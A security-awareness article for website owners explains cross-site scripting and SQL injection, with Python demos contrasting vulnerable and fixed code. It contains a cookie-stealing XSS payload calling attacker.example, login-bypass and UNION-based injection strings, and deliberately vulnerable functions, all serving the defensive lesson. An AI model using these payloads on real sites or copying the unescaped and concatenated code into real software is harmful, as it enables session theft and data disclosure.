Websites – Not as secure as you think.

Do you have a website? What do you know about cross-site scripting (XSS) or SQL injection? Not only could your website be vulnerable to defacement, but an attack may also lead to the disclosure of commercial or personal data.

One of the most common attacks used to deface web pages or hijack their visitors is cross-site scripting (XSS). The attacker gets a malicious script into a page your site serves, either by storing it (in a comment, profile field or product review that is later shown to other visitors) or by reflecting it (a crafted link whose parameter your site echoes back into the response). Because the script arrives from your domain, the victim's browser treats it as trusted and runs it with your site's privileges: it can read the page content, read any cookie not marked HttpOnly, and send requests to your site as the logged-in user. The browser's same-origin policy confines the script to your site, so it cannot roam the victim's computer, but it can act on the victim's behalf and give the attacker insight into how to launch further attacks on the website itself.
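The following is an added example, not code from the original article, showing the reflected case in the smallest possible form: a page that echoes a search term back to the user. The HTML skeleton, the cookie name and the attacker's payload (including the hostname attacker.example) are constructed for illustration.

```python
"""Reflected XSS: rendering user input unescaped versus escaped.

Added example, not part of the original article. The page template, the
payload and the hostname attacker.example are constructed for illustration.
"""
import html
import re

# Constructed payload of the kind an attacker would put in a link or a form
# field: it loads an image from a host the attacker controls, with the
# victim's cookies appended to the URL.
PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
           "+document.cookie</script>")

PAGE = """<!doctype html>
<html><body>
<h1>Search results</h1>
<p>You searched for: {query}</p>
</body></html>
"""


def render_vulnerable(query: str) -> str:
    """Reflects the user-supplied string straight into the page.

    Anything in the input that looks like markup is interpreted by the
    browser as markup, so a <script> tag in the input is executed.
    """
    return PAGE.format(query=query)


def render_safe(query: str) -> str:
    """Escapes the HTML metacharacters (& < > " ') before insertion.

    html.escape is the right encoding for text content and for quoted
    attribute values; other contexts (inside a <script>, inside a URL)
    need their own encoding.
    """
    return PAGE.format(query=html.escape(query, quote=True))


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_active_script(page: str) -> bool:
    """Crude check used to show the difference between the two renderings:
    does the page contain a literal <script tag a browser would execute?"""
    return _SCRIPT_TAG.search(page) is not None


def session_cookie_header(token: str) -> str:
    """Defence in depth for the case where an XSS does slip through.

    HttpOnly keeps the cookie out of document.cookie, Secure restricts it
    to TLS, and SameSite=Lax limits cross-site submission of it.
    """
    return (f"Set-Cookie: session={token}; HttpOnly; Secure; "
            "SameSite=Lax; Path=/")


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(render_vulnerable(PAYLOAD))
    print("--- escaped rendering ---")
    print(render_safe(PAYLOAD))
    print(session_cookie_header("constructed-session-token"))
```

Run it and compare the two outputs: in the first the browser sees a real script element, in the second it sees the text "&lt;script&gt;..." and displays it harmlessly. Escaping on output is the fix; the cookie flags only limit the damage once escaping has been forgotten somewhere.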

SQL injection targets the database behind the web page. Many applications build SQL statements by concatenating the text typed into a form field directly into the query string. If that text contains SQL syntax, for example a quote that closes the intended string literal followed by the attacker's own clauses, the database cannot tell the attacker's text from the developer's code and executes all of it. The usual result is the release of information the query was never meant to return; depending on the database and its permissions it can also mean modifying or deleting data, or, in some database products, running commands on the database server.
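As an added example (not code from the original article), here is a login check written both ways against an in-memory SQLite database. The users table, its rows and the two attacker inputs are constructed for illustration; the plaintext passwords are only there to keep the demo short, a real application stores password hashes.

```python
"""SQL injection: string-built query versus parameterised query.

Added example, not part of the original article. The table, rows and
attacker inputs are constructed for illustration.
"""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users, one of them an administrator."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (
            id INTEGER PRIMARY KEY,
            username TEXT NOT NULL,
            password TEXT NOT NULL,
            is_admin INTEGER NOT NULL
        );
        INSERT INTO users VALUES (1, 'alice', 'wonderland', 1);
        INSERT INTO users VALUES (2, 'bob',   'builder',    0);
    """)
    return conn


def vulnerable_sql(username: str, password: str) -> str:
    """Builds the statement by concatenation: the input becomes part of
    the SQL code, so a quote in the input ends the string literal and the
    rest of the input is parsed as SQL."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection,
                     username: str, password: str) -> Optional[str]:
    """Returns the matched username, or None if the credentials fail."""
    row = conn.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection,
               username: str, password: str) -> Optional[str]:
    """Parameterised statement: the values travel separately from the SQL
    text, so a quote in the input is just a character in the data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# Constructed attacker inputs. SQLite treats "--" as a comment to end of
# line, so everything after it (the password check) is discarded.
BYPASS_USERNAME = "' OR 1=1 --"
EXFIL_USERNAME = ("' UNION SELECT password FROM users "
                  "WHERE username = 'alice' --")


if __name__ == "__main__":
    db = make_db()
    print("query actually sent:", vulnerable_sql(BYPASS_USERNAME, "x"))
    print("vulnerable, bypass :", login_vulnerable(db, BYPASS_USERNAME, "x"))
    print("vulnerable, exfil  :", login_vulnerable(db, EXFIL_USERNAME, "x"))
    print("safe, bypass       :", login_safe(db, BYPASS_USERNAME, "x"))
    print("safe, real login   :", login_safe(db, "alice", "wonderland"))
```

The first attacker input turns the WHERE clause into "username = '' OR 1=1", which matches every row, so the vulnerable function logs the attacker in as the first user (the administrator) without a password. The second uses UNION to make the query return a column it was never meant to expose, which is exactly the data disclosure the article warns about. The parameterised version returns nothing for either input because the quote and the comment marker never reach the SQL parser as code.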

These attacks do not just expose your customers to phishing: they can be the first step towards the systems behind the website, giving access to sensitive business data and quite possibly personal data you are obliged to protect. So protect your business by building security into the full life cycle of website development (output encoding and parameterised queries are the basic defences against the two attacks above, with input validation as a second layer), and treat the architecture of the IT infrastructure behind the website, including how far a compromised web server or database account can reach, as part of your overall information security strategy.